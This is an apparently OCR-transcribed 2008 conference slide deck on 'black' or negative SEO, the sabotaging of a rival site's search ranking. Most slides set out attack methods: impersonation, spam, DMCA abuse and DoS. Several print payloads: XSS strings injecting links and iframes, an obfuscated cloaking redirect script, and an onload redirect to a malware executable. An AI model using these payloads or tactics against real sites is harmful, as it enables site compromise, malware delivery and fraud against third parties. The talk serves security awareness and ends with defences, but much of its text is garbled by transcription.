Black SEO Exposed - Security Assessment

Transcription

Black SEO Exposed - Security Assessment
Black SEO Exposed
Presented By Roberto Suggi Liverani
© 2008 Security-Assessment.com
About me
ƒ Roberto Suggi Liverani
ƒ Security Consultant - Security-Assessment.com
ƒ http://www.security-assessment.com
h
//
ƒ CISSP
ƒ Web App Pen Tester
ƒ OWASP New Zealand Founder/Leader -
htt //
http://www.owasp.org/index.php/New_Zealand
/i d
h /N
Z l d
ƒ Personal Site: http://malerisch.net
© 2008 Security-Assessment.com
Agenda
ƒ Introduction
ƒ SEO (Search Engine Optimisation) – concepts, definitions
ƒ Black
l k SEO – definition,
d f
security implications
l
ƒ Black SEO Exposed:
ƒ Methodology – the big plan
ƒ Reconnaissance – information gathering is the key
ƒ Target Resources Elimination – indirect attack techniques
ƒ Frontal attack – direct attack techniques
ƒ Collateral damage – other attack techniques
ƒ Tools – weapons
p
of SEO destruction
ƒ Recommendations
ƒ Case Study: personalsoftwarefinance.com – the target!
© 2008 Security-Assessment.com
Introduction
ƒ SEO – Search Engine Optimisation
ƒ Search engine optimization (SEO) is the process of improving the
volume and quality of traffic to a web site from search engines via
"natural" ("organic" or "algorithmic") search results for targeted
keywords.
ƒ TOP 10 search engines results page (SERP) = SEO industry
ƒ Some SEO terms: positioning, ranking, keywords
ƒ SEO Hats:
ƒ White Hat SEO: web promotion techniques following search
engine guidelines
ƒ Black Hat SEO: web promotion techniques not following any
guidelines
© 2008 Security-Assessment.com
Black SEO - Definition
ƒ Black SEO (or Negative SEO): sabotage techniques aiming to
reduce a web site's ranking in search engine results
ƒ Black SEO Security Concept Map
© 2008 Security-Assessment.com
Security Implications 1/2
ƒ The common perception towards black SEO:
ƒ Google: “There's almost nothing a competitor can do to harm
your ranking or have your site removed from our index”
index
ƒ General Assumption: “Black SEO is only related to SEO”
ƒ Black SEO and Security:
ƒ IT Security still does not include this category of attacks
ƒ Most
M t IT Security
S
it literature
lit t
does
d
nott even mention
ti the
th SEO tterm
ƒ The potential:
ƒ Black SEO attacks do not always involve exploitation of target
vulnerabilities
ƒ 50% of the OWASP Top 10 can be used to leverage black SEO
attacks
ƒ Knowledge gap between SEO hackers and WEB hackers is
reducing - Latest web spam techniques exploit XSS
© 2008 Security-Assessment.com
Security Implications 2/2
ƒ Black SEO security considerations:
ƒ Three elements in the security equation:
ƒ Attacker
k
ƒ Search engine
ƒ Target site
ƒ Search engine is the unknown variable in the security equation
ƒ Black SEO attacks:
ƒ Search engines process the attack
ƒ Attack results are not direct (might be visible after 3 days, 1
week, 1 month or might not be processed)
ƒ Attacker needs to monitor continuously attack results
ƒ Target needs to realise if under attack
© 2008 Security-Assessment.com
Methodology
If you know the enemy and know yourself, you need not fear the result
of a hundred battles. If you know yourself but not the enemy, for
eevery
e y victory
cto y ga
gained
ed you will also
a so suffer
su e a defeat.
de eat If you know
o
neither the enemy nor yourself, you will succumb in every battle.
- Sun Tzu
© 2008 Security-Assessment.com
Methodology
ƒ Black SEO methodology:
ƒ Target Reconnaissance
ƒ Target Resources Elimination
l
ƒ Frontal Attack
ƒ Collateral Damage
ƒ The weapons:
ƒ Search Engines, Hacking Tools, Black Hat SEO techniques, Spam
Tools
ƒ What does black SEO attack?
ƒ Home/Landing Page - www.targetsite.com
ƒ Specific web page - www.targetsite.com/product/xyz.htm
© 2008 Security-Assessment.com
Reconnaissance
http://www.flickr.com/photos/kden604/203323823/
© 2008 Security-Assessment.com
Reconaissance
ƒ Build target backlinks/neighbors map.
map Include:
ƒ Key (authoritative) target resources with high Page Rank
ƒ Direct incoming links
l k to target
ƒ 2nd/3rd Level incoming links to target
ƒ Outcoming target links
ƒ Approach target as complex structure with relationships:
Business Target
Political Target
The parent company
Political Party
Subsidiary companies
Political Election/Campaign
Sister companies
Political Affiliates
Significant business
partners
Supporting Politicians
Brands/Divisions
Supporters
© 2008 Security-Assessment.com
Reconnaissance - Tools
ƒ Extrapolate target links from search engines:
ƒ Google
ƒ site:targetsite.com – indexed
d
d pages off target site
ƒ link:targetsite.com – pages that link to target site
ƒ cache:targetsite.com – current cache of target site
ƒ info:targetsite.com – information on target site
ƒ related:targetsite.com – pages similar to target site
ƒ targetsite.com -> enter full URL into the search fields (+ all
subdomains combinations)
ƒ Google News, Google Groups and Google Alerts
ƒ Yahoo: Site Explorer - http://siteexplorer.search.yahoo.com/
ƒ http://targetsite.com – includes pages indexed and pages that
li k to
link
t target
t
t site
it
© 2008 Security-Assessment.com
Reconaissance - Tools
ƒ Live Search Macros http://search.live.com/macros/default.aspx?FORM=BJJK
ƒ Create an advanced search Macro on target site/web page
ƒ Other tools:
ƒ web.archive.org
web archive org – useful to identify content linked in the past
ƒ Maltego: excellent tool to display structure of any entity on the
internet.
te et http://www.paterva.com/web2/Maltego/maltego.html
ttp //
pate a co / eb / a tego/ a tego t
ƒ http://www.scrutinizethis.com/
ƒ http://www.abouturl.com/index.php
http://www abouturl com/index php
ƒ http://whois.domaintools.com
ƒ http://netcraft.net
http://netcraft net
ƒ http://www.webmaster-toolkit.com/
ƒ http://www.myipneighbors.com/
htt //
i
i hb
/
© 2008 Security-Assessment.com
Reconaissance - SEO Tools
ƒ Extrapolate target SEO data:
ƒ Firefox add-on: Seoquake (https://addons.mozilla.org/enUS/firefox/addon/3036)
ƒ Identify target SEO skills,
skills keywords and SERP positioning:
ƒ Check if target uses Google Web Master and/or Yahoo Site
Explorer
po e
ƒ Check if target is practicing any SEO techniques
ƒ Scan target with SEO software
Webceo - http://www.webceo.com
ƒ Check target
g backlinks
http://www.linkhounds.com/link-harvester/backlinks.php
© 2008 Security-Assessment.com
Eliminating target resources
© 2008 Security-Assessment.com
Eliminating target resources
ƒ The neighbours target map (visual concept):
ƒ Thinking like a search engine:
ƒ A link to a ppage
g = casting
g a vote
ƒ Votes are related to a specific content/information
ƒ Many votes to a site indicate that the site is “authoritative”
authoritative /
“trusted” for a specific content = best value to user
© 2008 Security-Assessment.com
Eliminating target resources
ƒ Eliminating target resources:
ƒ Remove/divert links from authoritative/trusted sites to target site
ƒ Remove/divert
/d
direct
d
and
d indirect
d
incoming links
l k to target site
ƒ Two main attack approaches:
ƒ Hack neighbours sites and remove links
ƒ Social engineering + direct attack
ƒ First approach not always feasible. Second approach:
ƒ Impersonate target and social engineer target resources
ƒ Motives to remove/divert link: rebranding, restructuring,
maintenance, new domain, spam links, etc.
ƒ Enforce case with new domain registered as target, XSS/SQL
injection, spam links, etc.
© 2008 Security-Assessment.com
Eliminating target resources
ƒ A possible attack scenario:
ƒ Impact:
p
ƒ Decreased quality/quantity of target neighbours
ƒ Target position and rank affected
© 2008 Security-Assessment.com
Frontal attacks
© 2008 Security-Assessment.com
Frontal Attacks Table
ƒ Frontal attacks classification
Scope
Exploit
Complexity
Probability
of success
Attack
Timeframe
Decrease:
• rank
• position
• backlinks
Low/Medium
High/Medium Long
• Reversing search
engines
• Web Spam as a
proof
• Crawling
• Indexing
• Caching
Demonstrate:
target is:
• deceitful
• fraudulent
• spamming
p
g
High
Low/Medium
Medium
• Target vulnerable
• Low
quality/quantity
target backlinks
• Moderate/Absent
target SEO skills
• Human review of
spam reports
• Tools speed
indexing
(quantity/quality)
Impact
Position/Rank
decreased
Target
ban/penalisation
ƒ The two scopes
p and the techniques
q
involved have completely
p
y
opposite results
ƒ Attacker makes a choice depending on: available timeframe,
resources, skills
kill and
d target
t
t exploitability
l it bilit
© 2008 Security-Assessment.com
Decreasing target positioning
ƒ Attack: Spam social bookmarks with target URL
ƒ Digg.com, Reddit.com, Onlywire.com, etc
ƒ Automatic script + sociall bookmarks
b k
k API
http://www.onlywire.com/api/add?url=http://targetsite&ti
tle=targetsite&comments=targetsite&tags=targetsite
ƒ Impact: Target can be banned. Target site loses links from
trusted/high PR domains
ƒ Attack: Duplicate target content in:
ƒ target site (exploit stored XSS or SQL injection)
ƒ domain with higher PR of target site (buy another site)
ƒ many sites (build network of clones)
ƒ Impact: Target penalised for duplicate content
© 2008 Security-Assessment.com
Decreasing target positioning
ƒ Attack: Submit web proxy + target site to search engines
ƒ Use proxy with a higher PR and/or higher number of backlinks
than target
ƒ Use proxy that do not obfuscate target URL
http://www.zzoop.com/index.php?=&=http://targetsite/
http://www.zzoop.com/index.php?
& http://targetsite/
ƒ Impact: target position may drop suddenly
ƒ Attack: Mass submissions of target to low quality web directories
ƒ Most of them are free. Low quality = n/a or PR 0
ƒ Publication can take up to 6 months. Do mass submission.
ƒ http://www.web-directories.ws
ƒ Impact: Decrease quality of neighbours. Position decreased.
© 2008 Security-Assessment.com
Decreasing target positioning
ƒ Attack: Create backlinks to unused target subdomain
ƒ www.targetsite.com – 200 OK (used/promoted)
ƒ targetsite.com – 200 OK (not
(
used)
d) <- backlinks
b kl k target
ƒ No 301 redirection and both subdomains must point to same
content
ƒ Impact: Positioning affected
ƒ Attack: DoS target
ƒ Spider needs a 404 Not Found response from target
ƒ Then request removal of unavailable target pages
ƒ Impact: Target page removed from SERPS
© 2008 Security-Assessment.com
Decreasing target positioning
ƒ Attack: Promote target site URL + dynamic content such as:
ƒ Session IDs
ƒ Variables
bl with
h long
l
values
l
http://targetsite/?PHPSESSIONID=a8s7d8782378273827381273821s98d&productId=a9
982938219038291832918391389218931&a2=9sa8d9as7d9a7d98sa7d8sa7d8asdsa&b2=1203
18291289381938921&login=true
ƒ Impact: positioning decreasing, pages removal or no pages caching
ƒ Attack: Promote competition of target using White Hat SEO
competition
target
competition
ƒ Impact: positioning decreased
© 2008 Security-Assessment.com
Decreasing target positioning
ƒ Attack: Build fake content based on target keywords
ƒ Turn everything from the target keywords into education
content which provides real value to end user
ƒ Promote fake content with black hat/white hat SEO techniques
Fake
Legitimate
Fake
Legitimate
Fake
Legitimate
Legitimate
ƒ Impact: positioning shift
© 2008 Security-Assessment.com
Target perceived as spammer
Alonzo: [after killing Roger and shooting Jeff] It's not what you know,
it's what you can prove.
Training Day, 2001
© 2008 Security-Assessment.com
Target perceived as spammer
ƒ Attack: Inject permanent links pointing to bad sites into target
<a href=http://badsite>target site keywords</a>
<a href=http://badsite>spam keywords</a>
ƒ Exploit
l stored
d XSS, SQL injection in target
ƒ Injection must be stealth, deceitful, smart, balanced
ƒ Attack should last as long as possible
ƒ If possible, make cross links between target and bad sites
ƒ Impact: Penalisation and/or ban of target site
ƒ Bad site can contain:
ƒ Spam
ƒ Porn
ƒ Malicious Content (malware, virus, trojan/backdoor)
ƒ Warez/Cracks/Torrents/File Sharing Links/Illegal Files
ƒ Links to other bad sites
© 2008 Security-Assessment.com
Target perceived as spammer
ƒ Bad site can be:
ƒ PayPerClick Page/Blog/Fake Directory/Fake Forum/Scraped Page
ƒ Bannedd
ƒ Phishing
ƒ Thin Affiliate
ƒ Free link Exchange
ƒ Bad site can use:
ƒ JavaScript Redirects - JavaScript used for cloaking
ƒ Keyword Stuffing - overloaded page with excessive keywords
ƒ Backdoor ppages
g –p
page
g that hides backdoor (+
( redirection))
ƒ 100% Frame – frameset with one frame 100% to deceive search
engines spiders
© 2008 Security-Assessment.com
Target perceived as spammer
ƒ Hidden text/Hidden Links – hidden content with intention to
deceive search engines
ƒ Foreign Language – foreign language with intention to confuse
search engines
ƒ Sneaky Redirects – redirection through rotating domains
ƒ Same class C IP addresses and same domain registrant details of
target site
© 2008 Security-Assessment.com
Target perceived as spammer
ƒ Attack: Promote target XSS link
http://targetsite.com?search=a”><a href=http://badsite>target site keywords</a><!—
http://targetsite.com?search=a”><iframe src=\\badsite></iframe><!—
http://targesite.com?frameurl=http://badsite
p
g
p
http://targetsite.com?redirect=http://badsite
ƒ Links must point to bad sites
ƒ Promote XSS link + target keyword with black-hat SEO
ƒ Use link farms, splogs, guest books, forums, any article/page
th t enable
that
bl comments
t with
ith good
d PR
ƒ Target site needs to appear in top 10 SERP for the keyword
promoted
ƒ If attack is successful, report target to search engines with
search URL,, keyword
y
and target
g URL
ƒ Impact: Penalisation and/or ban of target
© 2008 Security-Assessment.com
Target perceived as spammer
ƒ Attack: Inject cloaking JavaScript into target site
<script language="JavaScript"> var
r=document.referrer,t="",q;if(r.indexOf("google.")!=1)t="q";if(r.indexOf("msn.")!=-1)t="q";if(r.indexOf("live.")!=1)t="q";if(r.indexOf("yahoo.")!=-1)t="p";if(r.indexOf("altavista.")!=1)t="q";if(r.indexOf("aol.")!=-1)t="query";if(r.indexOf("ask.")!=1)t="q";if(document.cookie.length==0 && t.length &&
(document.URL.indexOf("?cloakhook=")!=-1 && ((q=r.indexOf("?"+t+"="))!=1||(q=r.indexOf("&"+t+"="))!=-1)){window.location="http://badsite/";}</script>
1||(q
r.indexOf( & +t+
))! 1)){window.location http://badsite/ ;}</script>
ƒ Cloaking must point to bad sites
ƒ Promote cloaking hook with black-hat SEO
<a href=http://targetsite.com/?cloakhook=10>any keyword</a>
ƒ If attack is successful, report target to search engines
ƒ Impact:
p
Penalisation and/or
/ ban of target
g
© 2008 Security-Assessment.com
Target perceived as spammer
ƒ Attack: Inject redirection into target
ƒ HTML meta tag refresh with a very short time
ƒ JavaScript triggering redirection
d
onmouseover event
<META http-equiv="refresh" content=“0;URL=http://badsite/buyviagra.php">
<body onmouseover=“document.location(‘//badsite/buyviagra.php’)>
ƒ Impact: Penalisation and/or ban of target
ƒ Attack: Splog target
ƒ Use spam script/tool that leaves target URL in thousands of blog
comments and forums
ƒ Create large number of blogs spamming target and using
syndicated services such as RSS to be used in blog pings
ƒ http://pingomatic.com/
ƒ Impact:
I
t ban/penalisation
b /
li ti
© 2008 Security-Assessment.com
Target perceived as spammer
ƒ Attack: Exploit XSS vulnerability in trusted sites to promote target
ƒ Create link farm to index XSS link to target site
ƒ Xssed.com
d
lists
l
vulnerable
l
bl sites with
h high
h h PR
<a href=‘http://www.imdb.com/List?locations="><iframe src=//targetsite.com>
</iframe>’>keyword to be ranked</a>
<a href =‘http://help.yahoo.com/bin/help/redirect.cgi?to_url=
http://targetsite.com’>keyword to be ranked</a>
ƒ Attack: Spam target in universities pages, forums, sites with high PR
ƒ Some EDU pages are available at low price
ƒ Use target name in the account name (reflected in URL)
<a
<a
<a
<a
<a
href=‘http://groups.google.com/group/targetsite’>keyword</a>
href=‘http://www.bebo.com/targetsite’>keyword</a>
h
f ‘htt //
b b
/t
t it ’ k
d /
href=‘http://www.mixx.com/users/targetsite’>keyword</a>
href=‘http://infostore.org/user/targetsite’>keyword</a>
href=‘http://cgi.cse.unsw.edu.au/~targetsite/targetsite.html’>keyword</a>
ƒ Impact: Target ban
© 2008 Security-Assessment.com
Target perceived as spammer
ƒ Attack: Store copyrighted material into target site
ƒ Material pertinent to target from copyrighted sources (books,
encyclopaedias white papers
encyclopaedias,
papers, etc
etc.))
ƒ Issue DMCA complaint if target is US based to search engines
and to target ISP
ƒ Impact: target site page temporary removal (legal case)
ƒ Attack:
ttac Spa
Spam ta
target
get ssite
te in spa
spam page
ƒ Use comments in spam page illegally ranking in top 10 SERPS
ƒ Exploit XSS,
XSS SQL injection or any injection
ƒ Report both spammer and target to search engines
ƒ Impact:
ban
I
t target
t
tb
© 2008 Security-Assessment.com
Target perceived as spammer
ƒ Attack: Buy paid links on behalf of target
ƒ Paid links marketplaces:
www tnx net - www.isellpagerank.com
www.tnx.net
www isellpagerank com
ƒ Inject links identified as “paid links” into target
ƒ Attack: Show target is selling paid-links
paid links
ƒ Target site must have a good PR (at least 3 or 4)
ƒ Sell
S ll links
li k on target
t
t behalf
b h lf through
th
h link
li k marketplaces
k t l
ƒ Inject links on sale through stored XSS or SQL injection
ƒ Attack: Trade links on behalf of target
ƒ Impersonate target to send emails for link trading
ƒ Inject links through XSS, SQL injection or any injection
ƒ In all cases, report target to search engines
ƒ Impact: target site removal/penalisation
© 2008 Security-Assessment.com
Collateral Damage
http://www.flickr.com/photos/mongol/447087265/
© 2008 Security-Assessment.com
Collateral Damage
ƒ Collateral damage: damage in terms of web marketing context,
context
reputation/image
ƒ Attack: 302 hijacking target
ƒ Well known Google bug (not completely fixed)
ƒ Point many 302 redirections to target site
ƒ Implement cloaking on landing page
Target
Target
hijacked
ƒ Impact: target site content displacement
© 2008 Security-Assessment.com
Collateral Damage
ƒ Attack: Create a malware connection with target
ƒ Malware hosted on target site or on a third party site
ƒ Inject JavaScript which
h h launches
l
h malware
l
<img src=a.gif
onload=javascript:document.location.href='http://malwaresite/malware.exe'; />
ƒ Report target site to: Stopbadware.org - McAfee Site Advisor –
AVG Link Scanner
ƒ Impact:
I
t Target
T
t Sit
Site P
Public
bli Image
I
ƒ Attack: Google bombing/bowling target site with negative keywords
ƒ Still works on Google, Yahoo and Live
ƒ Pickup a non-common / negative-impact keyword
ƒ Promote target site link with negative keyword in good quality
link farm
<a href=‘http://targetsite’>bad keyword</a>
ƒ Impact:
I
t target
t
t reputation
t ti and
d iimage
© 2008 Security-Assessment.com
Collateral Damage
ƒ Attack: Expose target sensitive pages to SERPS
ƒ Example: hidden directories, awstats, webalyzer, admin, URL
with username/password,
username/password etc
ƒ Google Dorks from GHDB http://johnny.ihackstuff.com/ghdb.php
ƒ Make target link indexed by search engines
ƒ Impact: exposure of statistics and sensitive data useful to
co pet t o
competition
© 2008 Security-Assessment.com
Weapons of SEO Destruction
ƒ Xrumer – http://www.botmaster.net/more1/
http://www botmaster net/more1/
ƒ Autosubmitter
ƒ Large database
d b
off forums,
f
groups pages available
l bl
ƒ Advanced control on threads and posts
ƒ Captcha and pictocode support
ƒ ProxyURL – http://www.esrun.co.uk/blog/proxy-url-creator/
ƒ Generates large list of proxy urls
ƒ Sed (Search Engine De-optimisation) ** JUST RELEASED **
http://malerisch.net/tools/negativeseo/sed.zip
ƒ Page generator with hidden text technique, target keyword
stuffing in meta tags,
tags title tags and other HTML elements
ƒ Associate phishing sites URLs from Safebrowsing to target
ƒ Associate
A
i t random
d
spam keywords
k
d to
t target
t
t
© 2008 Security-Assessment.com
Recommendations
ƒ Security Recommendations:
ƒ Secure the site - OWASP Testing Guide
ƒ Subscribe
b b to Google
l Webmaster
b
Tooll and
d Yahoo
h Site Explorer
l
ƒ Check incoming and outcoming links periodically
ƒ Set Google Alert
ƒ Check/monitor web server logs constantly
ƒ Disable 302 temporary redirection if used
ƒ Do not use redirection functions
ƒ Check periodically web server directory and application source
code for changes/presence of backdoors
© 2008 Security-Assessment.com
Case Study
ƒ Personalsoftwarefinance.com
Personalsoftwarefinance com – fake company selling fake software
ƒ Experiment environment factors:
ƒ Major Searchh Engines involved
l d (Google,
(
l Yahoo)
h )
ƒ Primary keywords: personal software finance
ƒ Domain name: personalsoftwarefinance.com
ƒ ICANN Registrar: Godaddy.com
ƒ Reputable Web Hosting: successfullhosting.com
ƒ SEO Tools used: Web Seo + common SEO techniques from
articles, books, etc
ƒ Web stats tools: awstats, webalizer, hsphere panel tools
ƒ Site is vulnerable common web vulnerabilities such as stored
XSS, SQL injections, XSRF
© 2008 Security-Assessment.com
Case Study
Time for the video!!!
© 2008 Security-Assessment.com
Conclusions
And remember
remember...
ƒ Q: What can I do if I'm afraid my competitor is harming my
ranking in Google?
ƒ Google: There's almost nothing a competitor can do to harm your
ranking or have your site removed from our index. If you're
concerned about another site linking to yours, we suggest
contacting the webmaster of the site in question. Google aggregates
and
a
d organizes
o ga es information
o at o pub
published
s ed o
on tthe
e web;
eb; we
e do
don'tt co
control
to
the content of these pages.
© 2008 Security-Assessment.com
Thanks!
http://www.security-assessment.com
http://www.security
assessment.com
Roberto Suggi Liverani
[email protected]
© 2008 Security-Assessment.com
References/Links
ƒ Negative SEO articles
ƒ
Black - Negative SEO Hits Mainstream Media
ƒ
Companies Offer to Damage Your Competitors Search Engine Rankings
ƒ
Companies
p
subvert search results to squelch
q
criticism
ƒ
Condemned To Google Hell - Forbes.com
ƒ
'Google bowling' and negative SEO All fair in love and war Searchlight - An SEO blog by Stephan Spencer - CNET Blogs
ƒ
Firms use evil SEO to kill rivals' Google rankings : News : Security - ZDNet Asia
ƒ
Google allowing other webmasters to damage your site
ƒ
Google-Proof PR - Forbes.com
ƒ
In Pictures 7 Ways Your Site Can Be Sabotaged - Forbes.com
ƒ
Having Fun at Donalds Expense - So How's this Happening? | Threadwatch.org
ƒ
Google's Matt Cutts' Blog GoogleWashed | Threadwatch.org
ƒ
Give me money or I will drop your Google Rank - Search Engine Watch Forums
ƒ
Fighting Off Negative Publicity and Affiliates in the SERPs : SEO Book.com
ƒ
Google Keeps Tweaking Its Search Engine - New York Times
ƒ
Google Should Offer Self Defense Against Spammy Inbound Links
ƒ
Google's Cookie
ƒ
Michael Sutton's Blog : A Tour of the Google Blacklist
ƒ
Matt Cutts Google
g bowling
g exists Threadwatch.org
g
ƒ
Kick Your Competitor With Negative SEO? - Google Blogoscoped Forum
ƒ
Negative SEO - Harming Your Competitors With SEO Negative SEO (Black SEO) Tactics - Fighting Dirty
ƒ
Negative SEO At Work: Buying Cheap Viagra From Google’s Very Own Matt Cutts - Unless You Prefer Reddit? Or Topix? ::
ƒ
My First Million on the Internet: Google Bowling and Negative SEO: Tearing Down Rather Than Building Up
ƒ
SEOmoz | Del.icio.us Cloaking to Combat Spam
© 2008 Security-Assessment.com
References/Links
ƒ Negative SEO articles
ƒ
SEOmoz | The Dark Side of Wikipedia
ƒ
The Saboteurs Of Search - Forbes.com
ƒ
SEOmoz SEO isn�t hacking
g - and data securityy tips
p
ƒ
SEO poisoning attacks growing
ƒ
Google Penalization: Text Links, Redirects Not Likely Causes - Spam Comment Links Maybe - The Story Continues - Robin Good's
Latest News
ƒ
Other sites can hurt your ranking | JLH Design Blog
ƒ
Building Authority Websites The Right Way | Denver SEO Guy | Knox in Denver
ƒ
How Much Money is a Top Google Ranking Worth to Your Business?
ƒ
Google allowing other webmasters to damage your ranking
ƒ
Why should I report paid links to Google?
ƒ Forums/Blogs
ƒ
Black Hat SEO Black Hat Forum - Powered by vBulletin
ƒ
Bl kh t SEO
Blackhat
ƒ
BlackHatCrew - Elite Webmaster SEO Forum
ƒ
Blackhat SEO » Blog Archive » Free blog hosts Digerati Marketing - The better search blog
ƒ
Earl Grey`s Black Hat SEO Forum and SEOBlackhat SEM Community - The first and leading Resource on Blackhat SE0
Happar com Support Forum / Register
Happar.com
ƒ
Evaluating Google Search Quality | Bruce Cat dot com evilgreenmonkey
ƒ
Google Search News
ƒ
Matt Cutts Gadgets, Google, and SEO IncrediBILL's Random Rants
ƒ
Half’s SEO Notebook
© 2008 Security-Assessment.com
References/Links
ƒ Forums/Blogs:
ƒ
IrishWonder’s SEO Consulting Blog
ƒ
Negative SEO blog SEOassassin
ƒ
Network Securityy Research and AI ø Blue Hat SEO-Advanced SEO Tactics ø
ƒ
SEO Black Hat Forum
ƒ
SEO Black Hat SEO Blog
ƒ
SEO Chicks |The SEO Blog with attitude
ƒ
roguespammer: A Rogue Spammer
ƒ
Search Engine Cloaking and Optimization Forum - SeoJeans / Hot Topics
ƒ
Stefan Juhl » Internet marketing, SEO & online media monetization Welcome to Seocracy.com
ƒ
Search Engine Marketing Tips & Search Engine News - Search Engine Watch
ƒ
SEO Forum
ƒ Negative/Positive SEO Techniques:
ƒ
302 Google Jacking - Has your page been hijacked - Home "Filler Friday: Google Bombing" from Über - Better than you, daily!»
H
How
D
Do Th
The D
Duplicate
li t C
Content
t t Filt
Filters Work?
W k?
ƒ
8 ways to abuse your XSS vulnerabilities - stefanjuhl.com
ƒ
Better search engine ranking Google ranking tips from a Google employee
ƒ
Better search engine rankings The risk of over-optimization How to remove your competitors from MSN Live!
ƒ
Hijack A Domain For 200$ at Conceptualist.com, By Sahar Sarid Funny Google's Cache Error
ƒ
Google and the Mysterious Case of the 1969 Pagejackers || kuro5hin.org
ƒ
Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs
ƒ
Link schemes
ƒ
http://tech.propeller.com/viewstory/2006/07/22/google-has-a-6-month-penalty-for-using-expired-domain/
ƒ
Improve search engine rankings
© 2008 Security-Assessment.com
References/Links
ƒ Negative/Positive SEO techniques:
ƒ
Improve search engine rankings Insider information about Google's ranking algorithm Own-the.net (Webappsec, SEO, and
general Web Dev)
ƒ
SEOmoz | XSS - How to get 20 .gov links in 20 minutes
ƒ
Using Canonical Domains to Sabotage Competitors in Google Threadwatch.org
ƒ
Stop 302 Redirects and Scrapers from Hijacking Web Page PR - Page Rank
ƒ
SpewMoney™ » Blog Archive » Getting traffic from Facebook or How her milkshake brings all the boys to my website SitePoint
Blogs » example.com vs. www.example.com… trouble!
ƒ
Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs
ƒ
The Dark Side of Search Engine Optimization - Organic SEO Wiki
ƒ
Official Google Webmaster Central Blog: The Impact of User Feedback, Part 1
ƒ SEO ttools/software:
l / ft
ƒ
Blackhat SEO - Esrun » Blackhat SEO Scripts
ƒ
Black Hat SEO Software Built to Make Money Fast - Black Hat Software
ƒ
Blackhat SEO - Esrun » GMAIL Account Creator [GAC] Dark SEO Programming
ƒ
Dark SEO Programming » captcha
ƒ
Dark Seo Team
ƒ
dnScoop - Domain Name Value, History, Stats Tool and Forums
ƒ
Free URL Redirection
Redirection, No Ads! Short Free Domain Name (you
(you.co.nr)
co nr)
ƒ
Google Remove URL - One for the Good Guys! » SEO Image Blog: Stardate
http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1
ƒ
Free Web Analytic, Search Engine, Page Rank and SEO Optimization Tools - Are you GoingUp?
ƒ
OnlyWire: The Only BookMarklet You
You'llll Ever Need!
ƒ
OnlyWire: The Only BookMarklet You'll Ever Need!
ƒ
Pagerank 10 #dS.t ~ darkseoteam.com Pagerank 9 #dS.t ~ darkseoteam.com
© 2008 Security-Assessment.com
References/Links
ƒ SEO Tools/Software:
ƒ
Pagerank 10 #dS.t ~ darkseoteam.com
ƒ
Pagerank 9 #dS.t ~ darkseoteam.com
ƒ
Report
p
a Spam
p
Result Search engine
g
SPAM detector
ƒ
SearchStatus | Firefox SEO Toolbar Extension
ƒ
Proton TM
ƒ
Recherche Fresh Bdd Google . darkseoteam.com .
ƒ
Rojo - the best free RSS and Atom feed reader Scraping and Posting your way to money on the Internet - Oooff.com
Oooff com
ƒ
Squidoo : Explore Lenses
ƒ
the-cloak home
ƒ
Web Spam Detection
ƒ
Whois lookup and Domain name search
ƒ
Who's linking to you? List your referrers, referers, http_referer, referer, referrer
ƒ
SerpArchive
ƒ
Web Directory List Ordered By Weakest Google PageRank
ƒ
top referrers for webmasters SitePoint Marketplace
ƒ
Save A Sale : Automated Sales Agent Search Engine Friendly Redirect Checker
© 2008 Security-Assessment.com